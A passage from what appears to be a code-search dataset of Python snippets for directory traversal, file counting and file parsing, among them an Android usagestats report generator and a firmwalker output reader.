CoordinatesList.append(eachfilename[eachfilename.index('Coord'):eachfilename.index('_PMT')])\r\n CoordinatesList = list(dict.fromkeys(CoordinatesList))\r\n \r\n# print(RoundNumberList, CoordinatesList, fileNameList)\r\n return RoundNumberList, CoordinatesList, fileNameList", "def add_loc(self):\n self.loc = 0\n for t in self.thys:\n with open(t, 'r') as f:\n for l in f:\n if l.strip():\n self.loc += 1", "def process_files(file_location, day):\n # construct file path\n file_dir = PREFIX+file_location\n file_pattern = file_dir+'lz_'+day+'*_raw.root'\n # print(file_pattern)\n file_list = glob.glob(file_pattern)\n print(\"There are %s MC files in the requested directory (%s).\" %(len(file_list), file_dir))\n file_names = []\n for f in file_list:\n file_name_only = f.split('/')\n file_names.append(file_name_only[-1])\n return file_names", "def scan(self,project_dir):\n ftypes = [\".csv\", \".data\", \".xlsx\"]\n print(\"Scanning directory : \",project_dir)\n print(\"Searching for : \",ftypes)\n self.localfiles = {}\n for dirpath, dirnames, filenames in os.walk(project_dir, topdown=True):\n for filename in filenames:\n for ftype in ftypes:\n if ftype in filename:\n self.localfiles[filename] = {\n \"filename\": filename,\n \"filesize\": getsize(os.path.join(dirpath, filename)),\n \"abspath\": os.path.join(dirpath, filename),\n \"dirpath\": dirpath,\n \n }\n print(\"Found These: \",[file_name for file_name in self.localfiles.keys()])", "def getFilePaths():\n \n image_dir = r'/hpc/wfok007/mpi_heart/Training Set'\n mask_paths = []\n image_paths = []\n for root, dirs, files in os.walk(image_dir, topdown=False):\n for name in files:\n if name == 'laendo.nrrd':\n mask_paths.append(os.path.join(root, name))\n elif name == 'lgemri.nrrd':\n image_paths.append(os.path.join(root, name))\n else:\n print ('%s is unknown' %name)\n return mask_paths, image_paths", "def total_files(self):\n command = \"SELECT searched FROM options;\"\n return self.c.execute(command)", "def get_checkpoint():\n\timport numpy as np\n\n\tcheckpoint = []\n\tfor directory in directories:\n\t\ttry: # try to find folder\n\t\t\tos.chdir('./'+directory)\n\t\texcept:\n\t\t\tcontinue\n\t\tcontents = os.listdir('./')\n\t\tif contents == []: # if folder is empty\n\t\t\tprint(\"No data for\", directory)\n\t\t\tos.chdir('..')\n\t\t\tcontinue\n\t\tcounter = []\n\t\tfor entry in contents:\n\t\t\tentry = entry.split('.')\n\t\t\tnum = entry[0][2:]\n\t\t\ttry: # excludes files that aren't of type x-y.jpg\n\t\t\t\tnum = int(num)\n\t\t\t\tcounter.append(num)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\tcheckpoint.append(max(counter))\n\t\tos.chdir('..')\n\tcheckpoint = np.mean(checkpoint)\n\treturn checkpoint", "def target_totalfiles(self):\n return self._cfg.get('totalfiles', None)", "def test_case_2():\n print(\"*********Test_case_2***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files(None, path)\n print(result)", "def scanFiles(directory, includes = [\"*\"], excludes = []):\n\treturn scanAll(directory, includes, excludes)[1]", "def fs_files_total(self):\n return self._fs_files_total", "def test_search_file(self):\n base_dir = join(get_current_path(), 'samples', 'base_dir1')\n output_dir = join(get_current_path(), 'samples', 'base_dir1', 'result')\n files = search_files(base_dir, output_dir)\n self.assertTrue(self.verify_sub_folders(list(files.keys())))\n\n # sub folders under Concord is not counted, only files\n self.assertEqual(len(files['Concord']), 5)\n self.assertEqual(len(files['ListCo Equity']), 1)\n 
self.assertEqual(len(files['CLO Equity']), 2)\n self.assertEqual(files['ListCo Equity'][0], join(base_dir, 'ListCo Equity', 'Positions1219.xlsx'))", "def get_all_metrics(dir):\r\n file_lst = os.listdir(dir)\r\n file_lst = list(filter(lambda x: re.findall(r'\\.csv$',x), file_lst))\r\n return file_lst", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def current_missing(**kwargs) -> int:\n data_path = os.environ.get(BBG_ROOT, '').replace('\\\\', '/')\n if not data_path: return 0\n return len(files.all_files(f'{data_path}/Logs/{missing_info(**kwargs)}'))", "def getNtot(self,dir):\n return int(readfile(dir + '/struct_enum.out')[-1].split()[0])", "def test_known_file_locations(dataset: linux.LinuxSourcesDataset):\n assert (dataset.src_tree_root / \"kernel\" / \"kexec.c\").is_file()\n assert (dataset.src_tree_root / \"kernel\" / \"smpboot.h\").is_file()", "def usagestats_parse(dirpath):\r\n # Create database\r\n # TODO: change to an easier format, probably json.\r\n db, cursor = create_table()\r\n\r\n # Some vars for logging\r\n processed = 0\r\n err = 0\r\n\r\n # Iterate through the /usagestats/ directory and fetch all files\r\n for root, dirnames, filenames in os.walk(dirpath, topdown=True, onerror=None, followlinks=False):\r\n if 'daily' in root or 'weekly' in root or 'monthly' in root or 'yearly' in root:\r\n # Retrieve the folder name to save what the frequency of the usagestats were:\r\n frequency = root.split('/')[-1]\r\n for filename in filenames:\r\n # Check if filename is only numbers (which is an epoch time representation)\r\n if filename.isnumeric():\r\n try:\r\n tree = ET.parse(os.path.join(root, filename))\r\n except ET.ParseError:\r\n parse_file_with_protobuf(os.path.join(root, filename), db)\r\n continue\r\n\r\n # We have sucessfully parsed the usagestats xml.\r\n # So continue processing\r\n tree_root = tree.getroot()\r\n\r\n for elem in tree_root:\r\n parse_sub_elements(frequency, elem, filename, db)\r\n\r\n # query for reporting\r\n cursor.execute('''\r\n select \r\n usage_type,\r\n datetime(lastime/1000, 'UNIXEPOCH', 'localtime') as lasttimeactive,\r\n timeactive as time_Active_in_msecs,\r\n timeactive/1000 as timeactive_in_secs,\r\n case last_time_service_used WHEN '' THEN ''\r\n ELSE datetime(last_time_service_used/1000, 'UNIXEPOCH', 'localtime')\r\n end last_time_service_used,\r\n case last_time_visible WHEN '' THEN ''\r\n ELSE datetime(last_time_visible/1000, 'UNIXEPOCH', 'localtime') \r\n end last_time_visible,\r\n total_time_visible,\r\n app_launch_count,\r\n package,\r\n CASE types\r\n WHEN '1' THEN 'MOVE_TO_FOREGROUND'\r\n WHEN '2' THEN 'MOVE_TO_BACKGROUND'\r\n WHEN '5' THEN 'CONFIGURATION_CHANGE'\r\n WHEN '7' THEN 'USER_INTERACTION'\r\n WHEN '8' THEN 'SHORTCUT_INVOCATION'\r\n ELSE types\r\n END types,\r\n 
classs,\r\n source,\r\n fullatt\r\n from data\r\n order by lasttimeactive DESC\r\n ''')\r\n all_rows = cursor.fetchall()\r\n\r\n # HTML report section\r\n h = open('./Report.html', 'w')\r\n h.write('<html><body>')\r\n h.write('<h2>Android Usagestats report (Dates are localtime!)</h2>')\r\n h.write('<style> table, th, td {border: 1px solid black; border-collapse: collapse;}</style>')\r\n h.write('<br />')\r\n\r\n # HTML headers\r\n h.write('<table>')\r\n h.write('<tr>')\r\n h.write('<th>Usage Type</th>')\r\n h.write('<th>Last Time Active</th>')\r\n h.write('<th>Time Active in Msecs</th>')\r\n h.write('<th>Time Active in Secs</th>')\r\n h.write('<th>Last Time Service Used</th>')\r\n h.write('<th>Last Time Visible</th>')\r\n h.write('<th>Total Time Visible</th>')\r\n h.write('<th>App Launch Count</th>')\r\n h.write('<th>Package</th>')\r\n h.write('<th>Types</th>')\r\n h.write('<th>Class</th>')\r\n h.write('<th>Source</th>')\r\n h.write('</tr>')\r\n\r\n for row in all_rows:\r\n usage_type = row[0]\r\n lasttimeactive = row[1]\r\n time_Active_in_msecs = row[2]\r\n timeactive_in_secs = row[3]\r\n last_time_service_used = row[4]\r\n last_time_visible = row[5]\r\n total_time_visible = row[6]\r\n app_launch_count = row[7]\r\n package = row[8]\r\n types = row[9]\r\n classs = row[10]\r\n source = row[11]\r\n\r\n processed = processed + 1\r\n # report data\r\n h.write('<tr>')\r\n h.write('<td>' + str(usage_type) + '</td>')\r\n h.write('<td>' + str(lasttimeactive) + '</td>')\r\n h.write('<td>' + str(time_Active_in_msecs) + '</td>')\r\n h.write('<td>' + str(timeactive_in_secs) + '</td>')\r\n h.write('<td>' + str(last_time_service_used) + '</td>')\r\n h.write('<td>' + str(last_time_visible) + '</td>')\r\n h.write('<td>' + str(total_time_visible) + '</td>')\r\n h.write('<td>' + str(app_launch_count) + '</td>')\r\n h.write('<td>' + str(package) + '</td>')\r\n h.write('<td>' + str(types) + '</td>')\r\n h.write('<td>' + str(classs) + '</td>')\r\n h.write('<td>' + str(source) + '</td>')\r\n h.write('</tr>')\r\n\r\n # HTML footer\r\n h.write('<table>')\r\n h.write('<br />')\r\n\r\n print('')\r\n print('Records processed: ' + str(processed))\r\n print('Triage report completed. See Reports.html.')", "def avail(self):\n\n return os.listdir(self.datadir)", "def checkSumWalk(top=\".\", func=checkSumHelper):\n values = []\n os.path.walk( top, checkSumHelper, values )\n return sum(values)", "def MainStats(path, filetype, NrExp, col, start, stop):\n# path= path.split('/') # here is better to google and see what is going on. 
Or experiment alone\n# path= \"/\".join(path[:-1]) \n dato=ExtractData_raw_files(path, filetype)\n dBase=dato.createDictBase()\n stats = Stats(dBase, NrExp, col, start, stop)\n means, stds=stats.Means_Stds()\n times = stats.time_return()\n return means , stds, times", "def _get_filepaths(self):\n self._printer(str(self.__len__()) + \" file paths have been parsed in \" + str(self.timer.end))\n if self._hash_files:\n return pool_hash(self.filepaths)\n else:\n return self.filepaths", "def totalFiles(pathCopyData, pathNetCDF, dateInit, dateFinal):\n dateInit = datetime.strptime(dateInit, '%Y-%m-%d')\n dateFinal = datetime.strptime(dateFinal, '%Y-%m-%d')\n dirr = pathCopyData\n dirr2 = pathNetCDF\n #name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.\\d\\d\\d\\d.nc'\n name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.a\\d\\d\\d\\d'\n date = '\\d\\d\\d\\d-\\d\\d-\\d\\d'\n fil = []\n ba = []\n patron2 = re.compile(date)\n patron = re.compile(name + '.*')\n for base, dirs, files in os.walk(dirr2, topdown=True):\n for value in files:\n if patron.match(value) != None:\n f = patron2.findall(value)\n dateNetCDF = datetime.strptime(f[0], '%Y-%m-%d')\n if (dateNetCDF < dateFinal) & (dateNetCDF > dateInit):\n fil.append(value)\n ba.append(base)\n fdata = df.DataFrame(fil, columns=['nameFile'])\n fbase = df.DataFrame(ba, columns=['nameBase'])\n fdata.to_csv(dirr + 'tfile.txt', encoding='utf-8', index=False)\n fbase.to_csv(dirr + 'tbase.txt', encoding='utf-8', index=False)", "def totalfiles(self):\n return len([sz for sz in self.iterate()])", "def lsinfo(path):", "def enumerate():\n names = [f for f in os.listdir(_INPUT_ROOT) if not\n os.path.isdir(os.path.join(_INPUT_ROOT, f))]\n return sorted(names)", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def _find_files(directory, dirs_to_look_in, files_to_search_for, \n current_dir, see_files):\n full_name = True\n if see_files:\n full_name = False\n files_to_load = search_directory(directory, \n look_in=dirs_to_look_in,\n search_for=files_to_search_for,\n file_type='files',\n current_dir=current_dir,\n full_name=full_name)\n if not files_to_load:\n raise UserWarning('No files were found matching the search for %s'\\\n ' in the directory(s) %s%s' \\\n % (files_to_search_for, directory, \n dirs_to_look_in))\n return files_to_load", "def findFiles(self):\n\n with open('analysis_result/firmwalkerOutput.txt', 'r') as firmwalker:\n for line in firmwalker:\n if line.startswith('##################################### ssh'):\n self.ssh = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### dropbear'):\n self.dropbear = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### busybox'):\n self.busyBox = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### telnet'):\n self.telnet = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### openssl'):\n self.openssl = next(firmwalker).strip('d/').strip('\\n')", "def missing_in_gn_by_file(self):\n return self._missing_gn_files", "def find_all_infilepaths(in_dir):\n workdir = os.getcwd()\n os.chdir(in_dir)\n\n infiles_paths = dict()\n for infilename in glob.glob(\"[0-9]*_[0-9]*_[0-9]*.hdf5\"):\n pos = infilename.split('_')\n pos[-1] = pos[-1].split('.')[0]\n pos = tuple(list(map(lambda s: int(s), pos)))\n num_pos = _3d_to_numeric\n infiles_paths[num_pos] = os.path.join(in_dir, 
infilename)\n\n os.chdir(workdir)\n return infiles_paths", "def dataStats(reportsDir = \"./reports/\"):\n legMulti = glob.glob(reportsDir+\"/leg/*.json\")\n legOne = glob.glob(reportsDir+\"/leg/oneproc/*.json\")\n legBroken = glob.glob(reportsDir+\"/leg/broken/*.json\")\n \n malMulti = glob.glob(reportsDir+\"/mal/*.json\")\n malOne = glob.glob(reportsDir+\"/mal/oneproc/*.json\")\n malBroken = glob.glob(reportsDir+\"/mal/broken/*.json\")\n \n print(\"\"\"Legal files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(legBroken+legMulti+legOne), len(legOne), len(legMulti), len(legBroken)))\n print(\"\"\"Malicious files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(malBroken+malMulti+malOne), len(malOne), len(malMulti), len(malBroken)))\n print(\"Working samples: {0}\".format(len(malMulti+malOne+legMulti+legOne)))", "def dirsize(self):\n total = 0\n for p in self.select_file(recursive=True):\n try:\n total += p.size\n except: # pragma: no cover\n print(\"Unable to get file size of: %s\" % p)\n return total", "def list_sources(config, base_dir, verbose=False):\n for source in config.sources_under(abspath(base_dir)):\n if verbose:\n print(\"# %s (%s)\" % (source.nicedir, ' '.join(source.info)))\n else:\n print(source.nicedir)", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def _local_dir(self):\n return []", "def check_init_files_and_folders():\n\t#['cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', 'cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', 'color_detect_2.py', 'dedupe.py', 'detect_image_group_ku.py', 'detect_shape_5.py', 'get_cam_id_2.py', 'get_image_8.py', 'gui_hsv.py', 'knaps.py', 'knapsack_2.py', 'maps.html', 'program_detect_rectangle.zip', 'start_capture.py']\n\tfile_list=[\n\t#'cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', \n\t'models/cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', \n\t#'color_detect_2.py', \n\t#'dedupe.py', \n\t'detect_bus_haar_group.py', \n\t#'detect_shape_5.py', \n\t'get_cam_detail.py', \n\t'get_image.py', \n\t#'gui_hsv.py', \n\t#'knaps.py', \n\t#'knapsack_2.py', \n\t#'maps.html', \n\t#'program_detect_rectangle.zip', \n\t'start_wimb.py',\n\t'g.php',\n\t]\n\tdirectory_list=[\n\t'images',\n\t'images_bgs',\n\t'images_bgs_mask',\n\t#'images_bgs_result',\n\t'images_color',\n\t'images_haar',\n\t'images_haar_result',\n\t'images_number',\n\t'images_number_result',\n\t'models',\n\t'images_old',\n\t'text_number',\n\t]\n\t\n\tfor file_name in file_list: print 'file '+file_name+' existed: '+str(os.path.isfile(file_name))\n\tfor directory_name in directory_list: \n\t\tprint 'directory '+directory_name+' existed: '+str(os.path.isdir(directory_name))\n\t\tif not os.path.isdir(directory_name): \n\t\t\tos.makedirs(directory_name)\n\t\tif \"images\" in directory_name: shutil.copy(path+'/g.php',path+'/'+directory_name+'/g.php')", "def get_num_samples(org_dir, file_names):\n count = 0\n # Loop through the files, which then loop through the trees\n for filename in file_names:\n # Skip files that are not .mrg\n if not filename.endswith('.mrg'):\n continue\n # File is .mrg. 
Start processing\n file_dir = os.path.join(org_dir, filename)\n with open(file_dir, 'r', encoding='utf-8') as reader:\n content = reader.readlines()\n for _ in content:\n count += 1\n\n return count", "def list_dir(self, path):", "def all_loci():\n for fname in listdir(join(DATA_PATH, 'loci')):\n try:\n yield fetch_locus(fname)\n except Exception as e:\n print(f'{repr(e)} fetching {fname}')", "def _discover_in_dir(self, dir_path: str) -> Optional[str]:\n for this_file in os.listdir(dir_path):\n if this_file.endswith('.esvi'):\n return os.path.join(dir_path, this_file)\n\n return None", "def _get_total_games(self) -> int:\n files = get_tfr_filenames(self.config)\n total_games = 0\n for file in files:\n total_games += int(str(file).split('-')[1].split('.')[0])\n return total_games", "def find_vasp_calculations():\n dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml\", recursive=True)\n ]\n gz_dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\\.gz\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml.gz\", recursive=True)\n ]\n return dir_list + gz_dir_list", "def n_file(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=True):\n n += 1\n return n", "def findMayaFiles(directory):\n\n pass", "def __calculate_current_row(self):\n last_data_file = None\n location = os.listdir(self.path)\n #Remove non-data files from our list of dirs.\n location = [element for element in location if 'data' in element]\n #Sort as integers so we get them in the right order.\n location = sorted(location, key=lambda x: int(x.split('.')[0].split('_')[1]), reverse = True)\n for f in location:\n if f[0:4] == 'data':\n last_line = None\n with open(self.path + '/' + f, 'r') as f:\n for line in f:\n if len(line) > 1:\n last_line = line\n if last_line:\n return json.loads(line)['row_id']\n\n return 0", "def _rnlst(self, path, filelist):\n path = self._cleanpath(path)\n dirdict = self.parsedir(path)\n print(dirdict)\n \n trycwds = dirdict.get('trycwds', [])\n names = dirdict.get('names', [])\n \n for trycwd, name in zip(trycwds, names): \n if trycwd: # name is a directory\n self._rnlst(self.remotepathsep.join([path, name]), filelist)\n else: \n filelist.append(self.remotepathsep.join([path, name]))\n \n return filelist", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if isfile(join(self.file_location,f)) ]\n return look4files", "def import_directory(self, directory):\n files_list = sys_utils.get_files_from_directory(directory)\n if files_list == None:\n return None, 0\n oids = []\n num_new_files = 0\n p = progress.progress(len(files_list))\n for file_location in files_list:\n oid, new_file = self.import_file(file_location)\n p.tick()\n if oid:\n oids.append(oid)\n if new_file:\n num_new_files += 1\n oids = list(set(oids)) # assert uniqueness \n return oids, num_new_files", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def _get_base_files(self):\n setup_file = path.join(self.PyCogentDirectory, 'setup.py')\n #reqs_file = path.join(self.PyCogentDirectory, 'cogent-requirements.txt')\n #return [(setup_file, 'Python'), (reqs_file, 'Properties')]\n return [(setup_file, 'Python')]", "def get_nb_files(directory):\r\n if not os.path.exists(directory):\r\n return 0\r\n cnt = 0\r\n for r, dirs, files in os.walk(directory):\r\n for dr in 
dirs:\r\n cnt += len(glob.glob(os.path.join(r, dr + \"/*\"))) # glob模块是用来查找匹配文件的,后面接匹配规则。\r\n return cnt", "def file_stat(self, file_path):", "def main():\n results = []\n results.extend(check_mounts())\n results.extend(diskusage())\n return results", "def get_number_of_files(directory: str):\n\n number_of_files = len([item for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(number_of_files)\n return number_of_files", "def getNFiles(self, config, base, logger=None):\n if 'nfiles' in config:\n return galsim.config.ParseValue(config, 'nfiles', base, int)[0]\n else:\n return 189", "def get_info(self):\n if os.path.isfile(self.path):\n total_size = os.path.getsize(self.path)\n total_files = 1\n elif os.path.exists(self.path):\n total_size = 0\n total_files = 0\n for x in os.walk(self.path):\n for fn in x[2]:\n fpath = os.path.normpath(os.path.join(x[0], fn))\n rel_path = os.path.relpath(fpath, self.path)\n if any(fnmatch.fnmatch(rel_path, ext) for ext in self.exclude):\n continue\n fsize = os.path.getsize(fpath)\n if fsize and not is_hidden_file(fpath):\n total_size += fsize\n total_files += 1\n else:\n raise exceptions.InvalidInputException\n if not (total_files and total_size):\n raise exceptions.EmptyInputException\n if self.piece_size:\n ps = self.piece_size\n else:\n ps = 1 << max(0, math.ceil(math.log(total_size / 1500, 2)))\n if ps < MIN_PIECE_SIZE:\n ps = MIN_PIECE_SIZE\n if ps > MAX_PIECE_SIZE:\n ps = MAX_PIECE_SIZE\n return (total_size, total_files, ps, math.ceil(total_size / ps))", "def get_testing_data(self):\n\n print 'Loading testing data ', self.test_folder , '...'\n test_text = []\n cnt = 0\n\n for f in listdir(self.test_folder):\n file_path = join(self.test_folder, f)\n if isfile(file_path):\n cnt += 1\n if cnt % 10000 == 0:\n print 'finished:', cnt # line counter\n self.test_index.append(f[:-4])\n with open(file_path, 'rb') as f:\n test_text.append( f.read() )\n\n return test_text", "def summarize(path: str) -> dict:\n results = parse_bactopia_directory(path)", "def perform_calculations():\n # contains the result of the total repositories\n result = [] \n count_all_lines = 0 # mainatains the line that has been counted\n for_loops_list = []\n func_parameters = [] # function parameter checks list\n no_of_variables = set() # a set containing variables\n docs_comments = [] \n single_line_comments = []\n code_duplication = 0\n repo_imports_set = set() # imports for the entire repo\n current_repo = ''\n for item in traverse_repos():\n current_repo = item['repo_url']\n for path in item['files']:\n with open(path, 'r') as file_:\n lines = file_.readlines()\n # call code duplication\n code_duplication += code_duplication_check(lines)\n for line in lines:\n if re.match(r'^#.+', line.strip()):\n single_line_comments.append(line.strip())\n # this makes it possible to campare later\n # call find_repo_imports\n line_import = find_repo_imports(line)\n \n repo_imports_set.add(line_import)\n # call countlines of code function\n count_all_lines += count_lines_of_code(line.strip())\n # call find_for_loops\n for_loops = find_for_loops(line)\n if for_loops:\n for_loops_list.append(for_loops)\n function = avarage_parameters(line)\n if function:\n func_parameters.append(avarage_parameters(line))\n no_of_variables.add(avarage_variables_per_line(line))\n\n with open(path, 'r') as content_file:\n content = content_file.read()\n docs_comments.extend(find_docstrings_and_comments(content, single_line_comments))\n \n \n\n external_packages = 
find_external_packages(repo_imports_set)\n repo_lines_of_codes = count_all_lines - len(docs_comments)\n avarage_variables_repo = (len(no_of_variables)-1) / repo_lines_of_codes\n nesting = nesting_depth(for_loops_list) / len(for_loops_list)\n avarage_params = sum(func_parameters) / len(func_parameters)\n repo_result = {\n 'repository_url': current_repo, \n 'number of lines': repo_lines_of_codes, \n 'libraries': external_packages,\n 'nesting factor': nesting,\n 'code duplication': code_duplication,\n 'average parameters': avarage_params,\n 'average variables': avarage_variables_repo\n \n }\n result.append(repo_result)\n\n return result", "def read_file_names(self):\n files_BIDMC = os.listdir(self.root_dir_BIDMC)\n masks_BIDMC = os.listdir(self.seg_dir_BIDMC)\n files_HK = os.listdir(self.root_dir_HK)\n masks_HK = os.listdir(self.seg_dir_HK)\n files_I2CVB = os.listdir(self.root_dir_I2CVB)\n masks_I2CVB = os.listdir(self.seg_dir_I2CVB)\n files_ISBI = os.listdir(self.root_dir_ISBI)\n masks_ISBI = os.listdir(self.seg_dir_ISBI)\n files_ISBI_15 = os.listdir(self.root_dir_ISBI_15)\n masks_ISBI_15 = os.listdir(self.seg_dir_ISBI_15)\n files_UCL = os.listdir(self.root_dir_UCL)\n masks_UCL = os.listdir(self.seg_dir_UCL)\n site_files = [files_BIDMC, files_HK, files_I2CVB, files_ISBI, files_ISBI_15, files_UCL]\n site_masks = [masks_BIDMC, masks_HK, masks_I2CVB, masks_ISBI, masks_ISBI_15, masks_UCL]\n return site_files, site_masks", "def lookup_ifproc_file(obsnum, path='/data_lmt/ifproc/', debug=False):\n paths = [path]\n\n if 'ifproc' not in path:\n paths += ['/data_lmt/ifproc/']\n if 'lmtttpm' not in path:\n paths += ['/data_lmt/lmttpm/']\n if 'tel' not in path:\n paths += ['/data_lmt/tel/']\n\n if debug:\n print(paths)\n\n for path in paths:\n filenames = glob.glob(os.path.join(path, '*_%06d_*.nc' % obsnum))\n if len(filenames) > 0:\n if debug:\n print('found %s' % (filenames[0]))\n return filenames[0]\n return ''\n #filename = ''\n #for file in os.listdir(path):\n # if fnmatch.fnmatch(file,'*_%06d_*.nc'%(obsnum)):\n # print('found %s'%(file))\n # filename = path+file\n #if filename == '':\n #print('lookup_ifproc_file: no file for obsnum ', obsnum)\n #if 'lmttpm' not in path:\n # print('look in lmttpm')\n # return lookup_ifproc_file(obsnum,path='/data_lmt/lmttpm/')\n #return(filename)", "def compute_code():\n for file in os.listdir('./src/Templates'):\n input.parse_template('./src/Templates/' + file, './student/' + file + '.py')\n data = input.load_input()\n return len([k for k in data['input'].keys() if '@' not in k])", "def calculate(d):\r\n\r\n # Set correct slashes for the OS\r\n if sys.platform == 'windows':\r\n slash = '\\\\'\r\n elif sys.platform == 'linux':\r\n slash = '/'\r\n else:\r\n print('#Error. Unknown platform.')\r\n return\r\n\r\n print('Files in the current directory and their md5-hashes:\\n')\r\n i = 0\r\n assert i == 0, '#Error. 
Variable i != 0.'\r\n\r\n for i in range(len(d[2])): # Go through the list of files\r\n full_path = d[0]+slash+d[2][i]\r\n print(full_path) # Get the list of files with full paths\r\n print(md5(full_path))\r\n size(full_path)", "def find_data(self):\n data_list = []\n for root, dirs, files in os.walk(pathfinder.data_path()):\n for name in files:\n data_list.append(os.path.join(root, name))\n return data_list", "def count_files_dir(self,full_path):\n try:\n num_files = len([name for name in os.listdir(full_path) if os.path.isfile(self.FILENAME)])\n print(f\"Number of files in {full_path} is {num_files}\")\n return num_files\n except Exception as e:\n raise SystemExit(f\"Could not complete operation: {e}\")", "def read_inputs(self):\n curdir = os.getcwd()\n os.chdir(self.fst_dir)\n rstat = self.readFST()\n if rstat == 0:\n os.chdir(curdir)\n return 0\n # the names of the next files are either set by caller or come from the reading the FAST file\n rstat = self.readNoise()\n rstat = self.readAD()\n rstat = self.readBlade()\n rstat = self.readPtfm()\n os.chdir(curdir)", "def getAllVCFs(inputFolder):\n listOfFiles = []\n numErrors = 0\n for folder in os.listdir(inputFolder): #Loop through all folders\n # print(folder)\n try: # using a try-xcept block to avoid errors with other files \n # not following this structure\n # TODO: make this cleaner\n vcfLoc = os.path.join(inputFolder, os.path.join(folder, \"pilon/\"))\n # print(vcfLoc)\n for potentialFile in os.listdir(vcfLoc):\n # print(potentialFile)\n if(potentialFile.endswith(\".vcf.gz\")):\n listOfFiles.append(os.path.join(vcfLoc, potentialFile))\n except:\n # print(\"error at \" + folder)\n numErrors += 1\n print(numErrors)\n return listOfFiles", "def _checkpoint_numbers(cls, checkpoints_dir):\n dirs = [d for d in listdir(checkpoints_dir) if d.endswith('.checkpoint')]\n return sorted([int(d[:-11]) for d in dirs])", "def get_amount_by_file(path):\n if os.stat(path).st_size == 0:\n raise Exception\n with open(path, 'r') as file:\n items = file.read().split(',')\n total = reduce(lambda x, y: int(x) + int(y), items)\n return total", "def readNSRelaxFiles(folder_path):\n\n run_arr = []\n Nrun_arr = []\n dod_arr = []\n crate_arr = []\n count=0\n\n # find number of files that starts with run\n # (this is the data file we want to read)\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun\"):\n count+=1\n\n # order the data files by run number, so we get descending crates\n Nrun=1\n for i in range(count+5):\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun_\"+str(Nrun)+\"_\"):\n run_arr.append(file)\n dod = re.search('dod=(.*).txt', file).group(1)\n crate = re.search('Crate=(.*)_',file).group(1)\n Nrun_arr.append(np.round(int(Nrun),decimals=0))\n dod_arr.append(float(dod))\n crate_arr.append(float(crate))\n Nrun+=1\n print(len(run_arr))\n\n return run_arr, Nrun_arr, dod_arr, crate_arr", "def _determine_local_import_names(start_dir):\n file_ext_pairs = [os.path.splitext(path) for path in os.listdir(start_dir)]\n return [\n basename\n for basename, extension\n in file_ext_pairs\n if extension == '.py' or os.path.isdir(\n os.path.join(start_dir, basename))\n and basename not in ('__pycache__')]", "def get_results_labels(dir_path):\n dx = 0\n directories = [dI for dI in os.listdir(dir_path)\n if os.path.isdir(os.path.join(dir_path, dI))]\n results = []\n\n for directory in directories:\n # collect the path to all results files\n path = os.path.join(dir_path, directory)\n files = [os.path.join(path, f) for f in 
os.listdir(path)\n if os.path.isfile(os.path.join(path, f))\n and 'results' in f]\n\n # if the directory does not have results files, move on to the next\n if len(files) == 0:\n continue\n\n # collect the average cumulative returns per training iteration\n res = []\n lengths = []\n for i, f in enumerate(files):\n data = pd.read_csv(f)\n if i == 0:\n dx = data['total/steps'][2] - data['total/steps'][1]\n res.append(data['rollout/return_history'])\n lengths.append(len(data['rollout/return_history']))\n\n res = [[r[:min(lengths)]] for r in res]\n results.append(np.concatenate(res, axis=0))\n\n return results, directories, dx", "def get_python_files(all_files=None):\n if all_files is None:\n all_files = ci_diff_helper.get_checked_in_files()\n\n production_files = []\n test_files = []\n for filename in all_files:\n if not valid_filename(filename):\n continue\n if is_test_filename(filename):\n test_files.append(filename)\n else:\n production_files.append(filename)\n\n return production_files, test_files", "def reportinfo(self):\n return super().reportinfo()[:2] + (self.fspath.relto(os.getcwd()),)", "def count_dirs_and_files(directory='.'):\n pass", "def 